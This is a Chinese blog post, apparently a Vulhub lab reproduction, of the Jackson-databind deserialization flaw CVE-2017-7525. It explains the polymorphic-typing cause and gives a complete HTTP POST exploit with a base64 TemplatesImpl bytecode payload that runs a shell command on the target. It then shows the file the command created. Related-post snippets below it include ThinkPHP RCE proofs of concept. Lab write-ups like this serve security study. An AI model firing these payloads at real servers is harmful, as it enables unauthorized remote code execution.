CVE-2017-7525(jackson反序列漏洞)

最新推荐文章于 2024-02-05 15:46:05 发布
最新推荐文章于 2024-02-05 15:46:05 发布
阅读量880 收藏
点赞数
分类专栏: 渗透测试 文章标签: java json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/114927631
版权

漏洞原理

Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 TemplatesImpl,可以实现任意代码执行。

详见:https://blog.csdn.net/xuandao_ahfengren/article/details/106805679

漏洞复现

地址:http://10.7.10.41:49157/

在这里插入图片描述
使用JDK7u21的com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl作为Gadget,发送如下请求,将会执行touch /tmp/prove1.txt:

POCPOST /exploit HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 1298
 
{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
  "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}

在这里插入图片描述
发现该目录下新建了个文件

[root@localhost /]# find -name "prove1.txt"
./tmp/prove1.txt

复现参考文章:https://blog.csdn.net/xuandao_ahfengren/article/details/106805679

p_utao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jackson-databind 序列漏洞CVE-2017-7525
玄道的网安博客
06-17 3716
漏洞原理 Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 TemplatesImpl,可以实现任意代码执行。 所以,本漏洞利用条件如下: 开启 Jackso
利用Vulnhub复现漏洞 - Jackson-databind 序列漏洞CVE-2017-7525
JiangBuLiu的博客
07-10 8304
Jackson-databind 序列漏洞CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485 Vulnhub官方复现教程 https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 漏洞原理 Jackson-da...
漏洞检测CVE-2017-7525---poc
01-20
漏洞检测CVE-2017-7525---poc
buuctf [ThinkPHP]5.0.23-Rce
qq_1873822的博客
03-14 1200
poc POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form.
buuctf-Real-[ThinkPHP]5.0.23-Rce
weixin_46079186的博客
05-09 652
题目地址 和前两题一样,去找poc 找到poc ,使用查看一下效果有回显。 根据前两题经验,flag肯定在phpinfo 里面 ,所以直接修改一下,拿到flag
BUUCTF-Real-ThinkPHP]5.0.23-Rce
分享
02-02 747
[ThinkPHP]5.0.23版本,RCE远程代码执行漏洞
BUUCTF-Real-[ThinkPHP]5-Rce
分享
01-31 804
多积累漏洞利用经验!
Jackson 最新序列漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
CVE-2020-24616:Jackson 多个序列化安全漏洞通告 .pdf
09-05
CVE-2020-24616是一个高风险的序列漏洞,评分7.5,影响了Jackson-databind版本小于2.9.10.6的所有用户。这个漏洞的特殊之处在于,它使得攻击者能够绕过Jackson-databind的黑名单限制,从而在特定条件下执行恶意...
Jackson-databind 序列漏洞CVE-2017-17485)
玄道的网安博客
06-17 1897
漏洞搭建 cd /root/vulhub/jackson/CVE-2017-7525 docker-compose up -d 漏洞原理 利用 FileSystemXmlApplicationContext加载远程 bean 定义文件,创建 ProcessBuilder bean,并在 xml 文件中使用 Spring EL 来调用 start()方法实现命令执行 CVE-2017-7525 黑名单修复绕过,利用了 org.springframework.context.suppor...
jackson-cve-2017-7525
haha1314的博客
08-07 561
jackson-cve-2017-7525 加上接受的内容格式会报错 在tmp目录下面创建一个prove1.txt文件,创建文件的命令是加密的,怎么加密的我也不知道。 POC { "param": [ "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", { "transletBytecodes": [ "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQE
Jackson CVE-2017-7525 序列漏洞
王嘟嘟的博客
03-01 886
Jackson 相对应fastjson来说利用方面要求更加苛刻,默认情况下无法进行利用。
Jackson-databind 序列漏洞复现(CVE-2017-7525
whojoe的博客
05-26 3379
Jackson-databind 序列漏洞复现(CVE-2017-7525)环境搭建启动docker下载环境生成docker环境漏洞检测区分 FastjsonJackson漏洞复现小结参考文章 环境搭建 启动docker systemctl start docker 下载环境 git clone https://github.com/vulhub/vulhub.git 也可以使用码云上个人维护的镜像 git clone https://gitee.com/fahawifi/vulhub.git
BUUCTF-Real-[ThinkPHP]IN SQL INJECTION
最新发布
分享
02-05 1644
ThinkPHP5 SQL注入漏洞
jackson CVE-2017-7525 漏洞复现
Shanfenglan's blog
11-29 1665
CVE-2017-7525 Jackson-databind 序列漏洞 原理 Jackson-databind 在设置 Target class 成员变量参数值时,若没有对应的 getter 方法,则会使用 SetterlessProperty 调用 getter 方法,获取变量,然后设置变量值。当调用 getOutputProperties() 方法时,会初始化 transletBytecodes 包含字节码的类,导致命令执行,具体可参考 java-deserialization-jdk7u21-ga
Jackson-databind 序列漏洞CVE-2017-7525)复现
HEAVEN569的博客
03-12 1967
1.漏洞出现的原因 Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当json字符串转换的Target class中有polymorph fields,即字段类型为接口、抽象或Object类型时,攻击者可以通过在json字符串中指定变量的具体类型(子类或者接口实现类,)来实现实例化指定的类,借助某些特殊的class,如TemplatesImpl,可以实现任意代码执行。 所以本漏洞利用条件如下 1.开启JacksonPo..
[ThinkPHP]5.0.23-Rce 漏洞复现
satasun的博客
12-07 3931
[ThinkPHP]5.0.23-Rce 环境搭建 github传送门 BUU传送门 POC 老懒狗选择直接buu,链接 http://node3.buuoj.cn:27512/ 直接用poc打一下: POST /index.php?s=captcha HTTP/1.1 Host: node3.buuoj.cn:27512 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (com
Jackson-databind 序列漏洞CVE-2017-7525&CVE-2017-17485)
EC_Carrot的博客
07-03 778
漏洞详细 具体详细请移步:https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 因为本人实在不懂这方面,只能先复现,然后慢慢磨了。 漏洞复现 CVE-2017-7525 发送以下数据包,即可执行touch /tmp/prove1.txt命令 POST /exploit HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en
【jascon漏洞复现】CVE-2017-7525序列漏洞+CVE-2017-17485远程代码执行漏洞
serendipity1130的博客
09-01 2323
Jackson漏洞主要集中在jackson-databind中,当启用Global default typing,类似于FastJson的autoType,会存在各种各样的序列化绕过类 区分FastjsonJackson: {"name":"S","age":21} {"name":"S","age":21,"agsbdkjada__ss_d":123} 这两个fastjson都不会报错,而jackson会报错,因为Jackson因为强制key与javabean属性对齐,只能少不能多 ke.
Jackson 序列漏洞(CVE-2019-14361和CVE-2019-144391修复
07-13
为了修复 Jackson 序列漏洞 CVE-2019-14361 和 CVE-2019-14439,你可以采取以下措施: 1. 升级 Jackson-databind 库:确保你的应用程序使用最新版本的 Jackson-databind 库。这些漏洞已在较新的版本中修复,因此升级到最新版本可以解决这些安全问题。 2. 验证输入数据:在序列化操作之前,始终验证输入数据的合法性。如果数据不符合预期的格式或结构,应该拒绝序列化操作。 3. 使用白名单机制:考虑使用白名单机制来限制可以被序列化的类。只允许序列化应用程序预期的类,而拒绝序列化其他类。 4. 预防远程代码执行:采取必要的安全措施,如禁用远程代码执行功能,以减少远程代码执行的风险。 5. 定期更新库和框架:定期更新和升级你使用的库和框架,以确保应用程序的安全性和稳定性。 请注意,这些措施只是一些常见的建议,具体的修复步骤可能因应用程序的特定环境和需求而有所差异。建议在实施修复前仔细评估和测试,以确保不会引入其他问题。此外,及时关注安全公告和厂商的更新信息也是非常重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值